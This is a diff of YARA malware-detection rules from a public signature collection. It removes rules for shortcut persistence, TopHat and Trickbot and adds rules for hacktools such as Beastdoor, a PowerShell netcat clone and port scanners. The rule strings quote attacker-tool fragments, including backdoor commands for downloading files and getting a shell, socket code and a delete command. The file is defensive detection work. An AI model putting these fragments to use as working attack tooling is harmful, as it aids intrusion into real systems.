-		$file1 = /[\x0a\x0d](IconFile|(Base|)URL)\s*=[^\x0d]*script:/ nocase
-		$url_clsid = "[{000214A0-0000-0000-C000-000000000046}]"
-		$url_explicit = "[InternetShortcut]" nocase
+		$s1 = "kernel32.dll" fullword ascii
+		$s2 = "CRTDLL.DLL" fullword ascii
+		$s3 = "__GetMainArgs" fullword ascii
+		$s4 = "WS2_32.DLL" fullword ascii
 
 	condition:
-		any of ( $url* ) and any of ( $file* ) and uint16( 0 ) != 0x5A4D and uint32( 0 ) != 0x464c457f and uint32( 0 ) != 0xBEBAFECA and uint32( 0 ) != 0xFEEDFACE and uint32( 0 ) != 0xFEEDFACF and uint32( 0 ) != 0xCEFAEDFE and filesize < 30KB
+		all of them and filesize < 180KB and filesize > 70KB
 }
-rule SIGNATURE_BASE_Methodology_Suspicious_Shortcut_Workingdirremote_HTTP : FILE
+rule SIGNATURE_BASE_Tiny_Network_Tool_Generic : FILE
 {
 	meta:
-		description = "Detects possible shortcut usage for .URL persistence"
-		author = "@itsreallynick (Nick Carr)"
-		id = "68e54f8a-11e4-59e4-8498-59d88e70e438"
-		date = "2019-09-27"
-		modified = "2023-12-05"
-		reference = "https://twitter.com/cglyer/status/1176184798248919044"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_url_persitence.yar#L261-L278"
+		description = "Tiny tool with suspicious function imports. (Rule based on WinEggDrop Scanner samples)"
+		author = "Florian Roth (Nextron Systems)"
+		id = "04b1c2c6-605c-52d5-aa07-f3b77a6c4593"
+		date = "2014-08-10"
+		modified = "2025-04-14"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L512-L545"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "c7c23c1253bf089519dec5f141f486425c6804640d9bffac9ce4c986ce25d323"
-		score = 50
+		logic_hash = "efd04ee3a7bb120cdff00369e1856dd03ec9db84e1fb3196bf5e1a8ebd302802"
+		score = 40
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash0 = "9e1ab25a937f39ed8b031cd8cfbc4c07"
+		hash1 = "cafc31d39c1e4721af3ba519759884b9"
+		hash2 = "8e635b9a1e5aa5ef84bfa619bd2a1f92"
 
 	strings:
-		$icon = "WorkingDirectory=http" nocase
-		$url_clsid = "[{000214A0-0000-0000-C000-000000000046}]"
-		$url_explicit = "[InternetShortcut]" nocase
+		$s0 = "KERNEL32.DLL" fullword ascii
+		$s1 = "CRTDLL.DLL" fullword ascii
+		$s3 = "LoadLibraryA" fullword ascii
+		$s4 = "GetProcAddress" fullword ascii
+		$y1 = "WININET.DLL" fullword ascii
+		$y2 = "atoi" fullword ascii
+		$x1 = "ADVAPI32.DLL" fullword ascii
+		$x2 = "USER32.DLL" fullword ascii
+		$x3 = "wsock32.dll" fullword ascii
+		$x4 = "FreeSid" fullword ascii
+		$x5 = "atoi" fullword ascii
+		$z1 = "ADVAPI32.DLL" fullword ascii
+		$z2 = "USER32.DLL" fullword ascii
+		$z3 = "FreeSid" fullword ascii
+		$z4 = "ToAscii" fullword ascii
 
 	condition:
-		$icon and any of ( $url* ) and uint16( 0 ) != 0x5A4D and uint32( 0 ) != 0x464c457f and uint32( 0 ) != 0xBEBAFECA and uint32( 0 ) != 0xFEEDFACE and uint32( 0 ) != 0xFEEDFACF and uint32( 0 ) != 0xCEFAEDFE and filesize < 30KB
+		uint16( 0 ) == 0x5a4d and all of ( $s* ) and ( all of ( $y* ) or all of ( $x* ) or all of ( $z* ) ) and filesize < 15KB
 }
-rule SIGNATURE_BASE_Methodology_Suspicious_Shortcut_Workingdirremote_SMB : FILE
+rule SIGNATURE_BASE_Beastdoor_Backdoor
 {
 	meta:
-		description = "Detects possible shortcut usage for .URL persistence"
-		author = "@itsreallynick (Nick Carr)"
-		id = "26e19fe3-c25c-53b0-9b41-c04803134bc2"
-		date = "2019-09-27"
-		modified = "2023-12-05"
-		reference = "https://twitter.com/cglyer/status/1176184798248919044"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_url_persitence.yar#L280-L297"
+		description = "Detects the backdoor Beastdoor"
+		author = "Florian Roth (Nextron Systems)"
+		id = "64f67233-6677-53c8-b212-f1a425f78803"
+		date = "2025-04-14"
+		modified = "2025-04-14"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L547-L567"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "5d9caa64ac730d34a2dcfb3368f8302849275b6ee16fe31f20978d72382b0d73"
-		score = 50
+		hash = "5ab10dda548cb821d7c15ebcd0a9f1ec6ef1a14abcc8ad4056944d060c49535a"
+		logic_hash = "35aa5d66c0fd4bf1995fc23a68283e8a28f31b5a1e1f3b742dd0ab89c48bf403"
+		score = 55
 		quality = 85
-		tags = "FILE"
+		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$icon = "WorkingDirectory=file://" nocase
-		$url_clsid = "[{000214A0-0000-0000-C000-000000000046}]"
-		$url_explicit = "[InternetShortcut]" nocase
+		$s0 = "Redirect SPort RemoteHost RPort  -->Port Redirector" fullword
+		$s1 = "POST /scripts/WWPMsg.dll HTTP/1.0" fullword
+		$s2 = "http://IP/a.exe a.exe            -->Download A File" fullword
+		$s7 = "Host: wwp.mirabilis.com:80" fullword
+		$s8 = "%s -Set Port PortNumber              -->Set The Service Port" fullword
+		$s11 = "Shell                            -->Get A Shell" fullword
+		$s14 = "DeleteService ServiceName        -->Delete A Service" fullword
+		$s15 = "Getting The UserName(%c%s%c)-->ID(0x%s) Successfully" fullword
+		$s17 = "%s -Set ServiceName ServiceName      -->Set The Service Name" fullword
 
 	condition:
-		$icon and any of ( $url* ) and uint16( 0 ) != 0x5A4D and uint32( 0 ) != 0x464c457f and uint32( 0 ) != 0xBEBAFECA and uint32( 0 ) != 0xFEEDFACE and uint32( 0 ) != 0xFEEDFACF and uint32( 0 ) != 0xCEFAEDFE and filesize < 30KB
+		2 of them
 }
-
-rule SIGNATURE_BASE_Tophat_Malware_Jan18_1 : FILE
+rule SIGNATURE_BASE_Powershell_Netcat
 {
 	meta:
-		description = "Detects malware from TopHat campaign"
+		description = "Detects a Powershell version of the Netcat network hacking tool"
 		author = "Florian Roth (Nextron Systems)"
-		id = "ec290eee-a21e-548d-b7cc-3e25e7c39d22"
-		date = "2018-01-29"
-		modified = "2023-12-05"
-		reference = "https://researchcenter.paloaltonetworks.com/2018/01/unit42-the-tophat-campaign-attacks-within-the-middle-east-region-using-popular-third-party-services/#appendix"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_tophat.yar#L13-L36"
+		id = "e4b018c0-3214-5102-93b1-6a048324f9dd"
+		date = "2014-10-10"
+		modified = "2025-04-14"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L569-L583"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "69a1e1105b28d66203f74e68038efacc926e501e28a73865485adf2fd7fc0ac0"
-		score = 75
+		logic_hash = "ff9d7c3e83fd27620559306c07556ce7afd1ba7a5db5f5c21ad0841d58b85014"
+		score = 60
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "5c0b253966befd57f4d22548f01116ffa367d027f162514c1b043a747bead596"
-		hash2 = "1f9bca1d5ce5d14d478d32f105b3ab5d15e1c520bde5dfca22324262e84d4eaf"
 
 	strings:
-		$s1 = "WINMGMTS:\\\\.\\ROOT\\CIMV2" fullword ascii
-		$s2 = "UENCRYPTION" fullword ascii
-		$s3 = "TEXPORTAPIS" fullword ascii
-		$s4 = "tcustommemorystream" fullword ascii
-		$s5 = "tmemorystream" fullword ascii
-		$s6 = "ExtrasNoteCONSOLEemb" fullword ascii
-		$s7 = "DIALOG INCLUDE" fullword ascii
+		$s0 = "[ValidateRange(1, 65535)]" fullword
+		$s1 = "$Client = New-Object -TypeName System.Net.Sockets.TcpClient" fullword
+		$s2 = "$Buffer = New-Object -TypeName System.Byte[] -ArgumentList $Client.ReceiveBufferSize" fullword
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 400KB and ( pe.imphash ( ) == "c221006b240b1c993217bd61e5ee31b6" or 6 of them )
+		all of them
 }
-
-rule SIGNATURE_BASE_Tophat_Malware_Jan18_2 : FILE
+rule SIGNATURE_BASE_Chinese_Hacktool_1014
 {
 	meta:
-		description = "Auto-generated rule - file e.exe"
+		description = "Detects a chinese hacktool with unknown use"
 		author = "Florian Roth (Nextron Systems)"
-		id = "a1b8e477-df8a-5ff4-9108-541a0f082f77"
-		date = "2018-01-29"
-		modified = "2023-01-06"
-		reference = "https://researchcenter.paloaltonetworks.com/2018/01/unit42-the-tophat-campaign-attacks-within-the-middle-east-region-using-popular-third-party-services/#appendix"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_tophat.yar#L38-L60"
+		id = "e5db5f58-a1fd-51e0-9037-337fcca71f11"
+		date = "2014-10-10"
+		modified = "2025-04-14"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L585-L602"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "2321e89559363c04ef0e92a9c9e03d11ff27410103b3aaba954b544e33961b2f"
-		score = 75
+		hash = "98c07a62f7f0842bcdbf941170f34990"
+		logic_hash = "ffb1f653fd536a46dae4bf2c91c3c0582b703b8f0d33838b9736083e307a8e79"
+		score = 60
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "9580d15a06cd59c01c59bca81fa0ca8229f410b264a38538453f7d97bfb315e7"
 
 	strings:
-		$s1 = "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\FontSubstitutes" fullword ascii
-		$s2 = "\\SYSTEM\\CurrentControlSet\\Control\\Keyboard Layouts\\" ascii
-		$s3 = "LError loading dock zone from the stream. Expecting version %d, but found %d." fullword wide
-		$s4 = "WINMGMTS:\\\\.\\ROOT\\CIMV2" fullword ascii
-		$s5 = "UENCRYPTION" fullword ascii
-		$s6 = "TEXPORTAPIS" fullword ascii
+		$s0 = "IEXT2_IDC_HORZLINEMOVECURSOR" fullword wide
+		$s1 = "msctls_progress32" fullword wide
+		$s2 = "Reply-To: %s" fullword ascii
+		$s3 = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" fullword ascii
+		$s4 = "html htm htx asp" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 1000KB and ( pe.imphash ( ) == "f98cebcae832abc3c46e6e296aecfc03" and 5 of them )
+		all of them
 }
-rule SIGNATURE_BASE_Tophat_BAT : FILE
+rule SIGNATURE_BASE_CN_Hacktool_BAT_Portsopen
 {
 	meta:
-		description = "Auto-generated rule - file cgen.bat"
+		description = "Detects a chinese BAT hacktool for local port evaluation"
 		author = "Florian Roth (Nextron Systems)"
-		id = "81e84f1b-0ee7-530d-91ea-645c0994e68f"
-		date = "2018-01-29"
-		modified = "2023-12-05"
-		reference = "https://researchcenter.paloaltonetworks.com/2018/01/unit42-the-tophat-campaign-attacks-within-the-middle-east-region-using-popular-third-party-services/#appendix"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_tophat.yar#L62-L78"
+		id = "55c3f678-ba70-5a4a-b288-9d0953eff968"
+		date = "2014-12-10"
+		modified = "2025-04-14"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L604-L618"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "5dc58fa39d8b2aed95b39da575191fe5d10d5dd95b57c320cde8983505e7184f"
-		score = 75
+		logic_hash = "e5bc7b3264d7fc63fcc6c3d7e45859eb83b8ce60bd9a918f5eff887f626d09a3"
+		score = 60
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "f998271c4140caad13f0674a192093092e2a9f7794a7fbbdaa73ae8f2496c387"
-		hash2 = "0fbc6fd653b971c8677aa17ecd2749200a4a563f9dd5409cfb26d320618db3e2"
 
 	strings:
-		$s1 = "= New-Object IO.MemoryStream(,[Convert]::FromBase64String(\"" ascii
-		$s2 = "goto Start" fullword ascii
-		$s3 = ":Start" fullword ascii
+		$s0 = "for /f \"skip=4 tokens=2,5\" %%a in ('netstat -ano -p TCP') do (" ascii
+		$s1 = "in ('tasklist /fi \"PID eq %%b\" /FO CSV') do " ascii
+		$s2 = "@echo off" ascii
 
 	condition:
-		filesize < 5KB and all of them
+		all of them
 }
-rule SIGNATURE_BASE_Sharpcat : FILE
+rule SIGNATURE_BASE_CN_Hacktool_Ssport_Portscanner
 {
 	meta:
-		description = "Detects command shell SharpCat - file SharpCat.exe"
+		description = "Detects a chinese Portscanner named SSPort"
 		author = "Florian Roth (Nextron Systems)"
-		id = "94a7ce40-ac2f-598e-86c5-ee9fde1eeef0"
-		date = "2016-06-10"
-		modified = "2023-12-05"
-		reference = "https://github.com/Cn33liz/SharpCat"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_sharpcat.yar#L8-L23"
+		id = "38cc8830-efd3-51b7-8ac6-c9bf468212cb"
+		date = "2014-12-10"
+		modified = "2025-04-14"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L620-L634"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "4a38812b07b40bdde03049dbff1f9de38cadaf9941ab8b40b84016b1d5cbfd51"
-		score = 75
+		logic_hash = "30c380b6c683cbcbef7072e793d94e1782206b844fa23d334b737818f0a32f9f"
+		score = 70
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "96dcdf68b06c3609f486f9d560661f4fec9fe329e78bd300ad3e2a9f07e332e9"
 
 	strings:
-		$x1 = "ShellZz" fullword ascii
-		$s2 = "C:\\Windows\\System32\\cmd.exe" fullword wide
-		$s3 = "currentDirectory" fullword ascii
+		$s0 = "Golden Fox" fullword wide
+		$s1 = "Syn Scan Port" fullword wide
+		$s2 = "CZ88.NET" fullword wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 20KB and all of them
+		all of them
 }
-rule SIGNATURE_BASE_MAL_Trickbot_Oct19_1 : FILE
+rule SIGNATURE_BASE_CN_Hacktool_Scanport_Portscanner
 {
 	meta:
-		description = "Detects Trickbot malware"
+		description = "Detects a chinese Portscanner named ScanPort"
 		author = "Florian Roth (Nextron Systems)"
-		id = "b428cbf9-0796-5a01-9b98-28e1bc6827cc"
-		date = "2019-10-02"
-		modified = "2023-12-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_trickbot.yar#L3-L22"
+		id = "a708283e-339c-599f-9321-3b063d0076a9"
+		date = "2014-12-10"
+		modified = "2025-04-14"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L636-L650"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "fef15c0bda6dc2b28f34791da3ca68a03f7368b63ead17e631a2d4f05d1b40e2"
-		score = 75
-		quality = 85
-		tags = "FILE"
-		hash1 = "58852140a2dc30e799b7d50519c56e2fd3bb506691918dbf5d4244cc1f4558a2"
-		hash2 = "aabf54eb27de3d72078bbe8d99a92f5bcc1e43ff86774eb5321ed25fba5d27d4"
-		hash3 = "9d6e4ad7f84d025bbe9f95e74542e7d9f79e054f6dcd7b37296f01e7edd2abae"
+		logic_hash = "fa2dce57cc3e9baecb80b0165dfeb1af1ba4c4b30098e3b1252eb98b4fc30f7f"
+		score = 70
+		quality = 60
+		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "Celestor@hotmail.com" fullword ascii
-		$s2 = "\\txtPassword" ascii
-		$s14 = "Invalid Password, try again!" fullword wide
-		$op1 = { 78 c4 40 00 ff ff ff ff b4 47 41 }
-		$op2 = { 9b 68 b2 34 46 00 eb 14 8d 55 e4 8d 45 e8 52 50 }
+		$s0 = "LScanPort" fullword wide
+		$s1 = "LScanPort Microsoft" fullword wide
+		$s2 = "www.yupsoft.com" fullword wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize <= 2000KB and 3 of them
+		all of them
 }
-rule SIGNATURE_BASE_MAL_Trickbot_Oct19_2 : FILE
+rule SIGNATURE_BASE_CN_Hacktool_S_EXE_Portscanner
 {
 	meta:
-		description = "Detects Trickbot malware"
+		description = "Detects a chinese Portscanner named s.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "2ff69a51-d089-53e5-ab19-4fbdf20f90f8"
-		date = "2019-10-02"
-		modified = "2023-12-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_trickbot.yar#L24-L38"
+		id = "d6b35d4f-7e25-50dd-bef2-08f7033312e8"
+		date = "2014-12-10"
+		modified = "2025-04-14"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L652-L666"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "185e59c156218b418bec0c94144b19639c17e3a9595d993e3761eae15379f9fb"
-		score = 75
+		logic_hash = "658ae90f3af3c7abec6e692b6be350939ba7b654a9972d1a1016ff33e815a1de"
+		score = 70
 		quality = 85
-		tags = "FILE"
-		hash1 = "57b8ea2870f5176a30e6cba2d717fb3ff342f8bd36bac652dc4194a313b5fa64"
-		hash2 = "d75561a744e3ed45dfbf25fe7c120bd24c38138ac469fd02e383dd455a540334"
+		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$x1 = "C:\\Users\\User\\Desktop\\Encrypt\\Math_Cad\\Release\\Math_Cad.pdb" fullword ascii
-		$x2 = "AxedWV3OVTFfnGb" fullword ascii
+		$s0 = "\\Result.txt" ascii
+		$s1 = "By:ZT QQ:376789051" fullword ascii
+		$s2 = "(http://www.eyuyan.com)" fullword wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize <= 2000KB and 1 of them
+		all of them
 }
-
-rule SIGNATURE_BASE_MAL_Trickbot_Oct19_3 : FILE
+rule SIGNATURE_BASE_CN_Hacktool_Milkt_BAT
 {
 	meta:
-		description = "Detects Trickbot malware"
+		description = "Detects a chinese Portscanner named MilkT - shipped BAT"
 		author = "Florian Roth (Nextron Systems)"
-		id = "3428b7e3-def9-5574-bbbb-6ba98c134dec"
-		date = "2019-10-02"
-		modified = "2023-12-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_trickbot.yar#L40-L56"
+		id = "d680a5f1-6182-5bc8-99de-c3cba1a61903"
+		date = "2014-12-10"
+		modified = "2025-04-14"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L668-L681"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "87860212077b63bf3e4835a3a64b934fc7edd3258355a3e94a69acaba39c2516"
-		score = 75
+		logic_hash = "ad74c45db0ef52223eb4dd162a21c57074a4ecb869a841d836d14afc997a7478"
+		score = 70
 		quality = 85
-		tags = "FILE"
-		hash1 = "25a4ae2a1ce6dbe7da4ba1e2559caa7ed080762cf52dba6c8b55450852135504"
-		hash2 = "57b8ea2870f5176a30e6cba2d717fb3ff342f8bd36bac652dc4194a313b5fa64"
-		hash3 = "d75561a744e3ed45dfbf25fe7c120bd24c38138ac469fd02e383dd455a540334"
-		hash4 = "57b8ea2870f5176a30e6cba2d717fb3ff342f8bd36bac652dc4194a313b5fa64"
-		hash5 = "e92dd00b092b435420f0996e4f557023fe1436110a11f0f61fbb628b959aac99"
+		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "Decrypt Shell Fail" fullword ascii
+		$s0 = "for /f \"eol=P tokens=1 delims= \" %%i in (s1.txt) do echo %%i>>s2.txt" ascii
+		$s1 = "if not \"%Choice%\"==\"\" set Choice=%Choice:~0,1%" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize <= 2000KB and ( 1 of them or pe.imphash ( ) == "4e3fbfbf1fc23f646cd40a6fe09385a7" )
+		all of them
 }
-rule SIGNATURE_BASE_MAL_Trickbot_Oct19_4 : FILE
+rule SIGNATURE_BASE_CN_Hacktool_Milkt_Scanner
 {
 	meta:
-		description = "Detects Trickbot malware"
+		description = "Detects a chinese Portscanner named MilkT"
 		author = "Florian Roth (Nextron Systems)"
-		id = "dcadaa50-52ae-5ded-b40e-149f28092093"
-		date = "2019-10-02"
-		modified = "2023-12-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_trickbot.yar#L58-L77"
+		id = "aa83c983-25c2-5051-88a1-fbc70d947d6e"
+		date = "2014-12-10"
+		modified = "2025-04-14"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L683-L701"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "c109510d86260b4173bbbac5fe69936acb109e7fdbe71fbe2955e5ed85f5cd85"
-		score = 75
+		logic_hash = "707cbd625b5694b710d01622a053e60828da7f70b38e43012d04364137583fe9"
+		score = 60
 		quality = 85
-		tags = "FILE"
-		hash1 = "25a4ae2a1ce6dbe7da4ba1e2559caa7ed080762cf52dba6c8b55450852135504"
-		hash2 = "e92dd00b092b435420f0996e4f557023fe1436110a11f0f61fbb628b959aac99"
-		hash3 = "aabf54eb27de3d72078bbe8d99a92f5bcc1e43ff86774eb5321ed25fba5d27d4"
-		hash4 = "9ecc794ec77ce937e8c835d837ca7f0548ef695090543ed83a7adbc07da9f536"
+		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$x1 = "c:\\users\\user\\documents\\visual studio 2005\\projects\\adzxser\\release\\ADZXSER.pdb" fullword ascii
-		$x2 = "http://root-hack.org" fullword ascii
-		$x3 = "http://hax-studios.net" fullword ascii
-		$x4 = "5OCFBBKCAZxWUE#$_SVRR[SQJ" fullword ascii
-		$x5 = "G*\\AC:\\Users\\911\\Desktop\\cButtonBar\\cButtonBar\\ButtonBar.vbp" fullword wide
+		$s0 = "Bf **************" ascii fullword
+		$s1 = "forming Time: %d/" ascii
+		$s2 = "KERNEL32.DLL" ascii fullword
+		$s3 = "CRTDLL.DLL" ascii fullword
+		$s4 = "WS2_32.DLL" ascii fullword
+		$s5 = "GetProcAddress" ascii fullword
+		$s6 = "atoi" ascii fullword
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize <= 2000KB and 1 of them
+		all of them
 }
-rule SIGNATURE_BASE_MAL_Trickbot_Oct19_5 : FILE
+rule SIGNATURE_BASE_CN_Hacktool_1433_Scanner : FILE
 {
 	meta:
-		description = "Detects Trickbot malware"
+		description = "Detects a chinese MSSQL scanner"
 		author = "Florian Roth (Nextron Systems)"
-		id = "b3034f0c-5fd9-58a2-866f-9100e3a56f39"
-		date = "2019-10-02"
-		modified = "2023-12-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_trickbot.yar#L79-L96"
+		id = "77712d29-1a32-59e7-999a-a2ef02212886"
+		date = "2014-12-10"
+		modified = "2025-04-14"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L703-L720"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "e304b236dd58faa0e6fdd73bc93c24f6ff0ec6c1f9a54b104f8e87441834e22b"
-		score = 75
+		logic_hash = "3e51e3596fc90bcea46236728da5437a9b6f56a42d64a651940321f575b32129"
+		score = 40
 		quality = 85
 		tags = "FILE"
-		hash1 = "58852140a2dc30e799b7d50519c56e2fd3bb506691918dbf5d4244cc1f4558a2"
-		hash2 = "aabf54eb27de3d72078bbe8d99a92f5bcc1e43ff86774eb5321ed25fba5d27d4"
-		hash3 = "9ecc794ec77ce937e8c835d837ca7f0548ef695090543ed83a7adbc07da9f536"
-		hash4 = "9d6e4ad7f84d025bbe9f95e74542e7d9f79e054f6dcd7b37296f01e7edd2abae"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "LoadShellCode" fullword ascii
-		$s2 = "pShellCode" fullword ascii
-		$s3 = "InitShellCode" fullword ascii
+		$s0 = "1433" wide fullword
+		$s1 = "1433V" wide
+		$s2 = "del Weak1.txt" ascii fullword
+		$s3 = "del Attack.txt" ascii fullword
+		$s4 = "del /s /Q C:\\Windows\\system32\\doors\\" ascii
+		$s5 = "!&start iexplore http://www.crsky.com/soft/4818.html)" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize <= 2000KB and 2 of them
+		uint16( 0 ) == 0x5a4d and all of ( $s* )
 }
-rule SIGNATURE_BASE_MAL_Trickbot_Oct19_6 : FILE
+rule SIGNATURE_BASE_CN_Hacktool_1433_Scanner_Comp2 : FILE
 {
 	meta:
-		description = "Detects Trickbot malware"
+		description = "Detects a chinese MSSQL scanner - component 2"
 		author = "Florian Roth (Nextron Systems)"
-		id = "5feb8d34-4974-5315-a5f9-79a3fac83d1d"
-		date = "2019-10-02"
-		modified = "2023-12-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_trickbot.yar#L98-L115"
+		id = "7d707be5-dad0-5d91-965b-908a8603b6c0"
+		date = "2014-12-10"
+		modified = "2025-04-14"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L722-L736"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "599b1f56483f4ea267595b90dd4ef93b7e2147e4a0d8449cdd9d2539a96c3f79"
-		score = 75
+		logic_hash = "7c84d59a821531d9e741a05a23a911bb1caa825a18bb6532381e5ff38193c260"
+		score = 40
 		quality = 85
 		tags = "FILE"
-		hash1 = "cf99990bee6c378cbf56239b3cc88276eec348d82740f84e9d5c343751f82560"
-		hash2 = "cf99990bee6c378cbf56239b3cc88276eec348d82740f84e9d5c343751f82560"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$x1 = "D:\\MyProjects\\spreader\\Release\\ssExecutor_x86.pdb" fullword ascii
-		$s1 = "%s\\appdata\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\%s" fullword ascii
-		$s2 = "%s\\appdata\\roaming\\%s" fullword ascii
-		$s3 = "WINDOWS\\SYSTEM32\\TASKS" fullword ascii
+		$s0 = "1433" wide fullword
+		$s1 = "1433V" wide
+		$s2 = "UUUMUUUfUUUfUUUfUUUfUUUfUUUfUUUfUUUfUUUfUUUfUUUMUUU" ascii fullword
 
 	condition:
